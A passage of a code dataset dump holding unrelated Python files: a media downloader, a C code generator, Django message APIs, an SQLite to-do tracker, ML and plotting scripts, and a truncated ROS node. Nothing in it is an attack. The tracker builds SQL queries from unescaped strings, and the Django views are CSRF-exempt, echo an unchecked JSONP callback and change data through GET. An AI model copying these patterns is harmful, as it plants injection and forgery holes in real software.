== 12\r\n item.append(cid)\r\n item.append(title)\r\n infoList.append(item)\r\n\r\n return infoList\r\n\r\n\r\ndef getAudio(item, folder=''):\r\n bvid, cid, title = item[0], item[1], item[2]\r\n try:\r\n baseUrl = 'https://api.bilibili.com/x/player/playurl?fnval=16&'\r\n st = time.time()\r\n printA('Start download: ' + title)\r\n url = baseUrl + 'bvid=' + bvid + '&cid=' + cid\r\n\r\n audioUrl = requests.get(url).json()['data']['dash']['audio'][0]['baseUrl']\r\n\r\n opener = urllib.request.build_opener()\r\n opener.addheaders = [\r\n ('User-Agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0'),\r\n ('Accept', '*/*'),\r\n ('Accept-Language', 'en-US,en;q=0.5'),\r\n ('Accept-Encoding', 'gzip, deflate, br'),\r\n ('Range', 'bytes=0-'),\r\n ('Referer', 'https://api.bilibili.com/x/web-interface/view?bvid=' + bvid), # 注意修改referer,必须要加的!\r\n ('Origin', 'https://www.bilibili.com'),\r\n ('Connection', 'keep-alive'),\r\n ]\r\n urllib.request.install_opener(opener)\r\n urllib.request.urlretrieve(url=audioUrl, filename=folder + '/' + title + '.mp3')\r\n ed = time.time()\r\n printA(str(round(ed - st, 2)) + ' seconds download finish: ' + title)\r\n time.sleep(1)\r\n except Exception as e:\r\n printA(e.__str__())\r\n printA(\"Error: 无法下载:\" + title)\r\n\r\n\r\nif __name__ == '__main__':\r\n folder = ''\r\n if sys.argv[1] == 'c':\r\n folder = '中文'\r\n elif sys.argv[1] == 'j':\r\n folder = '日文'\r\n elif sys.argv[1] == 'p':\r\n folder = '钢琴曲'\r\n else:\r\n folder = sys.argv[1]\r\n\r\n print(\"Download to: \" + folder)\r\n BVList = sys.argv[2:]\r\n songs = getInformation(BVList)\r\n for item in songs:\r\n try:\r\n getAudio(item, folder)\r\n except:\r\n print(\"下载【%s】失败!\", item[2])\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"16692276","text":"from functools import reduce\n\n\nclass BaseCodeFileWriter:\n def __init__(self, compiler):\n self.compiler = compiler\n\n def write(self, filename):\n with open(filename, \"w\") as fh:\n self._write_implementation(fh)\n self._write_final_token_processed_function(fh)\n\n def _write_final_token_processed_function(self, fh):\n fh.write(\"\\n\")\n fh.writelines([\n \"void %sfinal_token_processed(%s *parserState) {\\n\" % (self.compiler.interface_prefix, self.compiler.state_variable_type),\n \" switch (parserState->state) {\\n\"\n ])\n\n leave_states = dict()\n for state in filter(lambda x: x.reset_state is not None, self.compiler.states):\n if state.reset_state.name not in leave_states:\n leave_states[state.reset_state.name] = []\n leave_states[state.reset_state.name].append(state)\n\n for leave_state, leaving_states in leave_states.items():\n for state in leaving_states:\n fh.write(\" case %s%s:\\n\" % (self.compiler.const_prefix, state.name))\n fh.write(\" parserState->state = %s%s;\\n\" % (self.compiler.const_prefix, leave_state))\n fh.write(\" break;\\n\")\n\n fh.writelines([\n \" default:\\n\",\n \" parserState->state = %sSTATE__START;\\n\" % self.compiler.const_prefix,\n \" break;\\n\",\n \" }\\n\",\n \"}\\n\"\n ])\n\n\nclass BaseHeaderFileWriter:\n def __init__(self, state_id_getter, compiler):\n self.state_id_getter = state_id_getter\n self.compiler = compiler\n self.longest_name_length = None\n\n def write(self, filename):\n self._find_longest_name_length()\n\n with open(filename, \"w\") as fh:\n fh.writelines([\n \"#include \\n\",\n \"#include \\n\"\n ])\n\n self._write_public_states(fh)\n self._write_flags(fh)\n self._write_typedef(fh)\n self._write_public_interface(fh)\n self._write_is_final_token_function(fh)\n self._write_expect_functions(fh)\n if self.compiler.debug:\n self._write_debug_final_state_function(fh)\n self._write_private_states(fh)\n\n def _find_longest_name_length(self):\n self.longest_name_length = reduce(lambda x, y: max(x, y), map(lambda x: len(x.name), self.compiler.states))\n\n def _write_public_states(self, fh):\n fh.write(\"\\n\")\n fh.write(\"#define %s%*s %d\\n\" % (self.compiler.const_prefix, -self.longest_name_length, \"STATE__FIRST_FINAL\", self.state_id_getter(self.compiler.final_final_state)))\n for state in filter(lambda x: x.is_final or x == self.compiler.start_state, self.compiler.states):\n fh.write(\"#define %s%*s %d\\n\" % (self.compiler.const_prefix, -self.longest_name_length, state.name, self.state_id_getter(state)))\n\n def _write_flags(self, fh):\n fh.write(\"\\n\")\n for flag in self.compiler.all_flags.values():\n fh.write(\"#define %s%*s %d\\n\" % (self.compiler.const_prefix, -self.longest_name_length, flag.identifier(), 1 << flag.index))\n\n def _write_typedef(self, fh):\n fh.write(\"\\n\")\n fh.write(\"typedef struct %s {\\n\" % self.compiler.state_variable_type)\n fh.write(\" %-20s %s;\\n\" % (\"uint16_t\", \"state\"))\n fh.write(\" %-20s %s;\\n\" % (\"uint8_t\", \"flags\"))\n fh.write(\" %-20s %s;\\n\" % (\"uint8_t\", \"len\"))\n for key, spec in self.compiler.variables.items():\n if spec.len is not None:\n fh.write(\" %-20s %s[%d];\\n\" % (spec.type, key, spec.len))\n else:\n fh.write(\" %-20s %s;\\n\" % (spec.type, key))\n fh.write(\"} %s;\\n\" % self.compiler.state_variable_type)\n fh.write(\"\\n\");\n fh.write(\"#define %s_INITIALIZER { %sSTATE__START, 0 };\\n\" % (self.compiler.state_variable_type.upper(), self.compiler.const_prefix))\n\n def _write_public_interface(self, fh):\n fh.write(\"\\n\");\n fh.writelines([\n \"extern bool %sprocess_character(%s *parserState, unsigned char c);\\n\" % (self.compiler.interface_prefix, self.compiler.state_variable_type),\n \"extern void %sfinal_token_processed(%s *parserState);\\n\" % (self.compiler.interface_prefix, self.compiler.state_variable_type),\n ])\n\n def _write_is_final_token_function(self, fh):\n fh.write(\"\\n\");\n fh.writelines([\n \"static inline bool %sis_final_token(uint16_t state) {\\n\" % self.compiler.interface_prefix,\n \" return state >= %sSTATE__FIRST_FINAL;\\n\" % self.compiler.const_prefix,\n \"}\\n\"\n ])\n\n def _write_expect_functions(self, fh):\n for key, expect in self.compiler.expects.items():\n fh.write(\"\\n\");\n fh.writelines([\n \"static inline bool %sexpect_%s(%s *parserState) {\\n\" % (self.compiler.interface_prefix, expect.name, self.compiler.state_variable_type),\n \" uint16_t state = parserState->state;\\n\",\n \" if (%s) {\\n\" % \" || \".join(map(lambda x: \"state == %s%s\" % (self.compiler.const_prefix, x), expect.states)),\n \" return true;\\n\",\n \" }\\n\",\n \" if (%sis_final_token(state)) {\\n\" % self.compiler.interface_prefix,\n \" %sfinal_token_processed(parserState);\\n\" % self.compiler.interface_prefix,\n \" }\\n\",\n \" return false;\\n\",\n \"}\\n\"\n ])\n\n def _write_debug_final_state_function(self, fh):\n fh.write(\"\\n\");\n fh.write(\"#include \\n\")\n fh.write(\"\\n\");\n fh.writelines([\n \"static int %sdebug_final_state(%s *parserState, unsigned char *buffer, size_t bufferLen) {\\n\" % ( self.compiler.interface_prefix, self.compiler.state_variable_type),\n \" switch (parserState->state) {\\n\"\n ])\n for state in filter(lambda s: s.is_final, self.compiler.states):\n fh.write(\" case %s%s:\\n\" % (self.compiler.const_prefix, state.name))\n format_string = state.name\n format_args = []\n for var in state.placeholders:\n name = var.get('name', var['variable'])\n format_args.append(\"parserState->%s\" % var['variable'])\n format_string = format_string + \" %s=\" % name\n if var['parse'] == \"string\":\n format_string = format_string + \"'%s'\"\n elif var['parse'] == \"decimal\" or var['parse'] == \"enum\":\n format_string = format_string + \"%d\"\n elif var['parse'] == \"integer\":\n format_string = format_string + \"%i\"\n else:\n format_string = format_string + \"%04x\"\n format_args = \", \".join(format_args)\n if len(format_args) > 0:\n format_args = \", \" + format_args\n fh.write(\" return snprintf(buffer, bufferLen, \\\"%s\\\"%s);\\n\" % (format_string, format_args))\n fh.writelines([\n \" }\\n\",\n \" return -1;\\n\",\n \"}\\n\"\n ])\n\n def _write_private_states(self, fh):\n fh.write(\"\\n\")\n for state in filter(lambda x: not x.is_final and x != self.compiler.start_state, self.compiler.states):\n if state.order % 10 == 0:\n fh.write(\"\\n\")\n fh.write(\"#define %s%*s %d\\n\" % (self.compiler.const_prefix, -self.longest_name_length, state.name, self.state_id_getter(state)))\n","sub_path":"tiny_string_parser/base_writers.py","file_name":"base_writers.py","file_ext":"py","file_size_in_byte":7548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"188186086","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.shortcuts import render\nfrom django.views.decorators.csrf import csrf_exempt\nimport json\nfrom collections import OrderedDict\nfrom django.http import HttpResponse\nfrom .models import DummyUser, Message\nfrom django.db.models import Q\nfrom datetime import datetime\nimport time\nimport calendar\n\n'''\nPairsの課題を解決する新機能提案プレゼン用API\n\n各々の関数でデータを詰め込んだdictをつくり、\nそれをrender_json_responseに渡してJSONに整形してreturnする。\n\n参考: Python Django入門 (6) JSONを返すAPIの部分\nhttp://qiita.com/kaki_k/items/b76acaeab8a9d935c35c\n'''\n\n# response を JSON で返却\ndef render_json_response(request, data, status=None):\n json_str = json.dumps(data, ensure_ascii=False, indent=2)\n callback = request.GET.get('callback')\n if not callback:\n callback = request.POST.get('callback') # POSTでJSONPの場合\n if callback:\n json_str = \"%s(%s)\" % (callback, json_str)\n response = HttpResponse(json_str, content_type='application/javascript; charset=UTF-8', status=status)\n else:\n response = HttpResponse(json_str, content_type='application/json; charset=UTF-8', status=status)\n return response\n\n# Method: GET\n# ユーザーデータをGETする\ndef user_data(request, user_id):\n user = DummyUser.objects.filter(id = user_id).first()\n\n data = OrderedDict([\n ('user_id', int(user_id)),\n ('user_name', user.name),\n ('gender', user.gender),\n ('age', user.age),\n ('job', user.job),\n ])\n\n return render_json_response(request, data)\n\n# Method: GET\n# message historyを返す部分\n# messageが id順(時系列) で返される\ndef message_history(request):\n #requestからuser_idとpartner_idを受け取る。\n user_id = request.GET.get(\"user_id\")\n partner_id = request.GET.get(\"partner_id\")\n\n user = DummyUser.objects.filter(id = user_id).first()\n partner = DummyUser.objects.filter(id = partner_id).first()\n\n if user and partner:\n # select where user1 partner2 user2 partner1\n # user->partner のメッセージ, partner->user のメッセージ両方取る\n messages = Message.objects.filter(\n Q(user_id = user_id, partner_id = partner_id) | Q(user_id = partner_id, partner_id = user_id)\n ).order_by('id')\n\n # Messageが無かったらmessagesの値は\"empty\"という文字列。\n # Messageが存在していたら、messagesの値はmessageが詰まったlistになる。\n if messages:\n messages_for_return = []\n for message in messages:\n tstr = message.created_at.strftime('%Y-%m-%d %H:%M:%S')\n tdatetime = datetime.strptime(tstr,'%Y-%m-%d %H:%M:%S')\n\n message_for_return = OrderedDict([\n ('id', message.id),\n ('user_id', message.user.id),\n ('partner_id', message.partner.id),\n ('content', message.content),\n ('created_at',calendar.timegm(tdatetime.timetuple())), # Unixtimeで返す\n ])\n messages_for_return.append(message_for_return)\n else:\n messages_for_return = []\n\n # returnするデータ\n data = OrderedDict([\n ('user_id', user.id),\n ('partner_id', partner.id),\n ('messages', messages_for_return),\n ])\n else:\n data = {\"status\":\"error\"}\n\n return render_json_response(request, data)\n\n# Method: POST\n# messageをデータベースに登録\n@csrf_exempt\ndef message_create(request):\n if \"content\" in request.POST:\n # query_paramが指定されている場合の処理\n user_id = request.POST.get(\"user_id\")\n partner_id = request.POST.get(\"partner_id\")\n content = request.POST.get(\"content\")\n\n #create\n Message.objects.create(\n user = DummyUser.objects.filter(id = user_id).first(),\n partner = DummyUser.objects.filter(id = partner_id).first(),\n content = content,\n # from_me 必ず 1 としておく(つまり、userが送り手側 / partnerが受け手側 ということ)\n from_me = 1,\n )\n\n resultdict = {\"status\":\"success\"}\n\n else:\n # query_paramが指定されていない場合の処理\n resultdict = {\"status\":\"error\"}\n\n return render_json_response(request,resultdict)\n\n# Method: GET\n# messageをデータベースに登録\n# あまりよくないがAndroid側の都合でGETでもできるように対応\n@csrf_exempt\ndef message_create_for_android(request):\n if \"content\" in request.GET:\n # query_paramが指定されている場合の処理\n user_id = request.GET.get(\"user_id\")\n partner_id = request.GET.get(\"partner_id\")\n content = request.GET.get(\"content\")\n\n #create\n Message.objects.create(\n user = DummyUser.objects.filter(id = user_id).first(),\n partner = DummyUser.objects.filter(id = partner_id).first(),\n content = content,\n # from_me 必ず 1 としておく(つまり、userが送り手側 / partnerが受け手側 ということ)\n from_me = 1,\n )\n\n resultdict = {\"status\":\"success\"}\n\n else:\n # query_paramが指定されていない場合の処理\n resultdict = {\"status\":\"error\"}\n\n return render_json_response(request,resultdict)\n\n# Method: GET\n# message_historyと同じように呼ぶ。履歴を全部けす。\n# あまりよくないがブラウザで叩いて簡単に操作できるようGETでやってる\ndef message_reset(request):\n #requestからuser_idとpartner_idを受け取る。\n user_id = request.GET.get(\"user_id\")\n partner_id = request.GET.get(\"partner_id\")\n\n user = DummyUser.objects.filter(id = user_id).first()\n partner = DummyUser.objects.filter(id = partner_id).first()\n\n if user and partner:\n # select where user1 partner2 user2 partner1\n # user->partner のメッセージ, partner->user のメッセージ両方取る\n messages = Message.objects.filter(\n Q(user_id = user_id, partner_id = partner_id) | Q(user_id = partner_id, partner_id = user_id)\n ).order_by('id')\n messages.delete()\n\n data = {\"status\":\"success\"}\n else:\n data = {\"status\":\"error\"}\n\n return render_json_response(request, data)\n","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"131443291","text":"class Solution:\n def closedIsland(self, grid) -> int:\n m, n = len(grid), len(grid[0])\n directs = [[-1, 0], [1, 0], [0, -1], [0, 1]]\n\n def dfs(x, y):\n grid[x][y] = 1\n ans = 0 < x < m - 1 and 0 < y < n - 1\n for dx, dy in directs:\n if dx == dy == 0:\n continue\n i, j = x + dx, y + dy\n if 0 <= i < m and 0 <= j < n and grid[i][j] == 0 and not grid[i][j]:\n ans &= dfs(i, j)\n return ans\n\n res = 0\n for i in range(m):\n for j in range(n):\n if grid[i][j] == 0 and dfs(i, j):\n res += 1\n return res\n\n\ns = Solution()\nprint(s.closedIsland(\n [[1, 1, 1, 1, 1, 1, 1, 0],\n [1, 0, 0, 0, 0, 1, 1, 0],\n [1, 0, 1, 0, 1, 1, 1, 0],\n [1, 0, 0, 0, 0, 1, 0, 1],\n [1, 1, 1, 1, 1, 1, 1, 0]]))\n","sub_path":"leetcode/2021/number-of-closed-islands.py","file_name":"number-of-closed-islands.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"533581062","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n#Libraries\nimport pandas as pd\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder\nimport matplotlib.pyplot as plt\n\n\n# In[3]:\n\n\n# Loading dataframe\ndf = pd.read_csv('C:/Users/TANVIR HOSSEN BAPPY/OneDrive/Desktop/housedatasets/train.csv')\npd.options.display.max_columns = None\ndf.head()\n\n\n# In[4]:\n\n\ndef encode(X, args):\n '''Encodes Columns containing string value with LabelEncoder'''\n le = LabelEncoder()\n \n for arg in args:\n encode = le.fit_transform(X[arg])\n X[arg] = encode\n return X\n\n\n# In[5]:\n\n\nX = df.drop(['Id', 'Alley', 'PoolQC', 'Fence', 'MiscFeature'], axis=1).dropna()\ny = X['SalePrice']\nX = X.drop(['SalePrice'], axis=1)\n\n\n# In[6]:\n\n\n# Label encoding & splitting data\nX = encode(X, ['MSZoning', 'Street',\n 'LotShape', 'LandContour', 'Utilities', 'LotConfig', 'LandSlope',\n 'Neighborhood', 'Condition1', 'Condition2', 'BldgType', 'HouseStyle', 'RoofStyle',\n 'RoofMatl', 'Exterior1st', 'Exterior2nd', 'MasVnrType',\n 'ExterQual', 'ExterCond', 'Foundation', 'BsmtQual', 'BsmtCond',\n 'BsmtExposure', 'BsmtFinType1', 'BsmtFinType2', 'Heating', 'HeatingQC',\n 'CentralAir', 'Electrical', 'KitchenQual',\n 'Functional', 'FireplaceQu', 'GarageType',\n 'GarageFinish', 'GarageQual', 'GarageCond',\n 'PavedDrive', 'SaleType',\n 'SaleCondition'])\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)\n\n\n# In[7]:\n\n\n# Linear Regression\nlin_reg = LinearRegression()\nlin_reg.fit(X_train, y_train)\n\n\n# In[8]:\n\n\n# Printing Score\nlin_reg.score(X_test, y_test)*100\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"AI assignment.py","file_name":"AI assignment.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"241892253","text":"import numpy\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport csv\r\n\r\n_MAX__NUMER = 6\r\n\r\n\r\nxLabelDateList = []\r\nyLabelDateList = []\r\n\r\n\r\ndef testFile(expdatefilename='fuck-hzfFORexp.csv'): # expdatefilename为指定的数据文件\r\n if expdatefilename not in os.listdir():\r\n expdatecsv = open(expdatefilename, 'a', newline=\"\")\r\n csv_writer = csv.writer(expdatecsv)\r\n for index in range(0, _MAX__NUMER):\r\n xLabelDate = index*0.5\r\n voltageDate = float(input(\"Input data\"+str(xLabelDate)+':'))\r\n csv_writer.writerow([xLabelDate, voltageDate])\r\n else:\r\n csv_file = open(expdatefilename, 'r')\r\n csv_reader = csv.reader(csv_file)\r\n\r\n drawPic(expdatefilename)\r\n\r\n''' if csv_reader.line_num < _MAX__NUMER:\r\n csv_file_size = csv_reader.line_num\r\n print(csv_file_size)\r\n for index in range(csv_file_size, _MAX__NUMER):\r\n xLabelDate = index*0.5\r\n voltageDate = float(input(\"Input data\"+str(xLabelDate)+':'))\r\n print([xLabelDate, voltageDate])\r\n csv_writer.writerow([xLabelDate, voltageDate])'''\r\n\r\ndef drawPic(expdatefilename='fuck-hzfFORexp.csv'):\r\n plt.figure(figsize=(12, 6))\r\n csv_file = open(expdatefilename, 'r')\r\n csv_reader = csv.reader(csv_file)\r\n for item in csv_reader:\r\n print(item)\r\n try:\r\n xLabelDateList.append(float(item[0]))\r\n yLabelDateList.append(float(item[1]))\r\n except IndexError:\r\n pass\r\n plt.plot(xLabelDateList, yLabelDateList, color='blue', linewidth=2, label='h')\r\n plt.xlabel('横轴:Ug2k(V)', fontproperties='FangSong', fontsize=20, color='r')\r\n plt.ylabel('纵轴:Ia(uA)', fontproperties='FangSong', fontsize=20, color='b')\r\n plt.plot(22.0, 1.60, 'ko')\r\n plt.text(21.0, 1.80, '(22.0,1.60)')\r\n plt.plot(30.5, 6.05, 'ko')\r\n plt.text(29.5, 6.25, '(30.5,6.05)')\r\n plt.plot(41.5, 12.00, 'ko')\r\n plt.text(40.5, 12.20, '(41.5,12.00)')\r\n plt.plot(53.0, 17.60, 'ko')\r\n plt.text(52.0, 17.80, '(53.0,17.60)')\r\n plt.plot(65.0, 23.29, 'ko')\r\n plt.text(64.0, 23.49, '(65.0,23.29)')\r\n plt.plot(77.5, 26.92, 'ko')\r\n plt.text(76.5, 27.12, '(77.5,26.92)')\r\n\r\n plt.show()\r\n\r\ndef getPeak():\r\n pass\r\n\r\n\r\ndef main():\r\n testFile()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"数据挖掘/fuck-hzfFORexp.py","file_name":"fuck-hzfFORexp.py","file_ext":"py","file_size_in_byte":2373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"114073543","text":"import os\nimport glob\nfrom setuptools import setup, find_packages\n\n__version__ = None\n\npth = os.path.join(\n os.path.dirname(os.path.realpath(__file__)),\n \"mdet_lsst_sim\",\n \"version.py\"\n)\nwith open(pth, 'r') as fp:\n exec(fp.read())\n\nscripts = glob.glob('bin/*')\nscripts = [s for s in scripts if '~' not in s]\n\nsetup(\n name=\"mdet_lsst_sim\",\n version=__version__,\n packages=find_packages(),\n scripts=scripts,\n author='Erin Sheldon',\n author_email='erin.sheldon@gmail.com',\n url='https://github.com/esheldon/mdet-lsst-sim',\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"399238777","text":"import torch\nimport torch.nn as nn\n\n\ndef split_feature(x):\n l = x.shape[1]\n x1 = x[:, 0:l // 2, ::]\n x2 = x[:, l // 2:, ::]\n return x1, x2\n\n\ndef split_n_features(x, n):\n x_list = list(torch.chunk(x, n, dim=1))\n return x_list\n\n\nclass rev_part(nn.Module):\n\n def __init__(self, in_ch):\n super(rev_part, self).__init__()\n self.f1 = nn.Sequential(\n nn.Conv2d(in_ch, in_ch, 3, padding=1),\n nn.LeakyReLU(inplace=True),\n nn.Conv2d(in_ch, in_ch, 3, padding=1),\n )\n self.g1 = nn.Sequential(\n nn.Conv2d(in_ch, in_ch, 3, padding=1),\n nn.LeakyReLU(inplace=True),\n nn.Conv2d(in_ch, in_ch, 3, padding=1),\n )\n\n def forward(self, x):\n x1, x2 = split_feature(x)\n y1 = x1 + self.f1(x2)\n y2 = x2 + self.g1(y1)\n y = torch.cat([y1, y2], dim=1)\n return y\n\n def reverse(self, y):\n y1, y2 = split_feature(y)\n x2 = y2 - self.g1(y1)\n x1 = y1 - self.f1(x2)\n x = torch.cat([x1, x2], dim=1)\n return x\n\n\nclass f_g_layer(nn.Module):\n def __init__(self, ch):\n super(f_g_layer, self).__init__()\n self.nn_layer = nn.Sequential(\n nn.Conv3d(ch, ch, 3, padding=1),\n nn.LeakyReLU(inplace=True),\n nn.Conv3d(ch, ch, 3, padding=1),\n )\n\n def forward(self, x):\n x = self.nn_layer(x)\n return x\n\n\nclass rev_3d_part1(nn.Module):\n\n def __init__(self, in_ch, n):\n super(rev_3d_part1, self).__init__()\n self.f = nn.ModuleList()\n self.n = n\n self.ch = in_ch\n for i in range(n):\n self.f.append(f_g_layer(in_ch // n))\n\n def forward(self, x):\n x = split_n_features(x, self.n)\n y1 = x[-1] + self.f[0](x[0])\n y = y1\n for i in range(1, self.n):\n y1 = x[(self.n - 1 - i)] + self.f[i](y1)\n y = torch.cat([y, y1], dim=1)\n return y\n\n def reverse(self, y):\n y = split_n_features(y, self.n)\n for i in range(1, self.n):\n x1 = y[self.n - i] - self.f[self.n - i](y[self.n - i - 1])\n if i == 1:\n x = x1\n else:\n x = torch.cat([x, x1], dim=1)\n x1 = y[0] - self.f[0](x[:, 0:(self.ch // self.n), ::])\n x = torch.cat([x, x1], dim=1)\n return x\n\n\nclass rev_3d_part(nn.Module):\n\n def __init__(self, in_ch):\n super(rev_3d_part, self).__init__()\n self.f1 = nn.Sequential(\n nn.Conv3d(in_ch, in_ch, 3, padding=1),\n nn.LeakyReLU(inplace=True),\n nn.Conv3d(in_ch, in_ch, 3, padding=1),\n )\n self.g1 = nn.Sequential(\n nn.Conv3d(in_ch, in_ch, 3, padding=1),\n nn.LeakyReLU(inplace=True),\n nn.Conv3d(in_ch, in_ch, 3, padding=1),\n )\n\n def forward(self, x):\n x1, x2 = split_feature(x)\n y1 = x1 + self.f1(x2)\n y2 = x2 + self.g1(y1)\n y = torch.cat([y1, y2], dim=1)\n return y\n\n def reverse(self, y):\n y1, y2 = split_feature(y)\n x2 = y2 - self.g1(y1)\n x1 = y1 - self.f1(x2)\n x = torch.cat([x1, x2], dim=1)\n return x\n","sub_path":"RevSCI-net/my_tools.py","file_name":"my_tools.py","file_ext":"py","file_size_in_byte":3185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"175439022","text":"from dbToDo import dbOperations\nimport datetime\n\nclass TrackerDbOperations(object):\n\n\t## global variables\n\tconnection = None\n\ttableName = 'Tracker'\n\tdataBaseName = 'TrackerDataBase.db'\n\tdboperations = None\n\t\t\n\t#Common DB Queries\n\tCREATE_TABLE_QUERY = \"CREATE TABLE {} (id int,createDate text,modifiedDate text , targetDate text, plan text)\".format(tableName)\n\tSELECT_QUERY = \"SELECT * from Tracker\"\n\t\n\tdef __init__(self):\n\t\tself.dboperations = dbOperations()\n\t\tself.connection = self.dboperations.connectToDB(self.dataBaseName)\n\t\tcursor = self.dboperations.getCursor(self.connection)\n\t\tif ( self.dboperations.isSchemaAvailable(self.connection,self.tableName) == 0):\n\t\t\tself.dboperations.executeQuery(cursor,self.CREATE_TABLE_QUERY)\n\t\t\t\n\t\t\n\tdef addPlan(self,targetTimeStamp,plan):\n\t\tself.connection = self.dboperations.connectToDB(self.dataBaseName)\n\t\tcursor = self.dboperations.getCursor(self.connection)\n\t\t\n\t\tresultSet = self.listPlan()\n\t\tif len(resultSet) <= 0:\n\t\t\tID = 1\n\t\tif len(resultSet) > 0:\n\t\t\tFIND_MAXID_QUERY=\"select max(id) from {}\".format(self.tableName,id)\n\t\t\trows = self.dboperations.executeQuery(cursor,FIND_MAXID_QUERY)\n\t\t\trow = rows.fetchone()\n\t\t\tID = int(row[0]) + 1\n\t\tcreateDate = \"'\" + str(datetime.datetime.now()) +\"'\"\n\t\tmodifiedDate = \"'\" + str(datetime.datetime.now())+\"'\"\n\t\ttargetDate = \"'\" + targetTimeStamp +\"'\" \n\t\tplan = \"'\" + plan +\"'\" \n\t\tcursor = self.dboperations.getCursor(self.connection)\n\t\tADD_PLAN_QUERY = \"INSERT INTO {}(id ,createDate,modifiedDate,targetDate,plan) VALUES({},{},{},{},{})\".format(self.tableName,ID,createDate,modifiedDate,targetDate,plan)\n\t\tc = self.dboperations.executeQuery(cursor,ADD_PLAN_QUERY)\n\t\tself.connection.commit()\n\t\t\n\tdef listPlan(self):\n\t\tself.connection = self.dboperations.connectToDB(self.dataBaseName)\n\t\tcursor = self.dboperations.getCursor(self.connection)\n\t\tcursor = self.dboperations.executeQuery(cursor,self.SELECT_QUERY)\n\t\tresultSet = cursor.fetchall()\n\t\treturn resultSet\n\n\tdef deletePlan(self,id):\n\t\tself.connection = self.dboperations.connectToDB(self.dataBaseName)\n\t\tcursor = self.dboperations.getCursor(self.connection)\n\t\tDELETE_QUERY=\"DELETE from {} where id={}\".format(self.tableName,id)\n\t\tcursor = self.dboperations.executeQuery(cursor,DELETE_QUERY)\n\t\tself.connection.commit()\n\n\tdef updatePlan(self,planDateTime,plan,id):\n\t\tself.connection = self.dboperations.connectToDB(self.dataBaseName)\n\t\tcursor = self.dboperations.getCursor(self.connection)\n\t\tmodifiedDate = str(datetime.datetime.now())\n\t\ttargetDate = planDateTime\n\t\tUPDATE_QUERY= \"UPDATE {} SET targetDate='{}', modifiedDate='{}', plan='{}' WHERE id={}\".format(self.tableName,targetDate,modifiedDate,plan,id)\n\t\tcursor = self.dboperations.executeQuery(cursor,UPDATE_QUERY)\n\t\tself.connection.commit()\n\n\tdef deleteExpiredplan(self):\n\t\tdateFormat = '%Y-%m-%d %H:%M:%S'\n\t\tself.connection = self.dboperations.connectToDB(self.dataBaseName)\n\t\tcursor = self.dboperations.getCursor(self.connection)\n\t\tcursor = self.dboperations.executeQuery(cursor,self.SELECT_QUERY)\n\t\tresultSet = cursor.fetchall()\n\t\tfor row in resultSet:\n\t\t\tid = row[0]\n\t\t\ttargetTimeStamp = datetime.datetime.strptime(row[3], dateFormat)\n\t\t\tcurrentTimeStamp = datetime.datetime.now()\n\t\t\tif(targetTimeStamp < currentTimeStamp):\n\t\t\t\tDELETE_QUERY=\"DELETE from {} where id={}\".format(self.tableName,id)\n\t\t\t\tcursor = self.dboperations.executeQuery(cursor,DELETE_QUERY)\n\t\t\t\tself.connection.commit()\n\t\treturn \"deleted all Expired plan\"\n\n# Functionality to be implemented later\t\t\t\t\n\tdef sendReminder(self):\n\t\t#send an email as reminder \n\t\tpass\n","sub_path":"trackerDBoperations.py","file_name":"trackerDBoperations.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"601502133","text":"#!/usr/bin/env python3\n\nimport rospy\nimport actionlib\nfrom actionlib_msgs.msg import GoalStatus\nfrom move_base_msgs.msg import MoveBaseAction\nfrom move_base_msgs.msg import MoveBaseActionGoal\nfrom move_base_msgs.msg import MoveBaseGoal\nfrom move_base_msgs.msg import MoveBaseActionFeedback\nfrom move_base_msgs.msg import MoveBaseActionResult\nfrom geometry_msgs.msg import PoseStamped\nfrom geometry_msgs.msg import Point\nfrom geometry_msgs.msg import Quaternion\nfrom nav_msgs.srv import GetMap, GetPlan\nfrom std_msgs.msg import Bool\nimport tf\nfrom math import pi, cos, sin, sqrt, atan2\nimport numpy as np\n\nclass Explorer:\n def __init__(self):\n\t\n self.psoe_sub = rospy.Subscriber(\"target_pose\", Point, self.pose_cb)\n self.status_pub = rospy.Publisher(\"navigation_result\", Bool, queue_size = 5)\n self.client = actionlib.SimpleActionClient('move_base',MoveBaseAction)\n self.client.wait_for_server()\n self.target_pose = (0,0,0)\n\n def pose_cb(self,data):\n self.target_pose = (data.x, data.y, data.z)\n self.explore()\n\n def explore(self):\n print(self.target_pose)\n status = self.reach_goal(self.target_pose)\n status_msg = Bool()\n print(status)\n print(type(status))\n if(status == True or status == 3):\n print(\"I successfuly reached goal\")\n status_msg.data = True\n else:\n print(\"Move base failed with status : {}\".format(status))\n status_msg.data = False\n # status_msg.data = True\n # self.client.cancel_goal()\n rospy.sleep(0.1)\n self.status_pub.publish(status_msg)\n\n def reach_goal(self, goal_pose):\n x, y, theta = goal_pose\n target_quat = tf.transformations.quaternion_from_euler(0, 0, 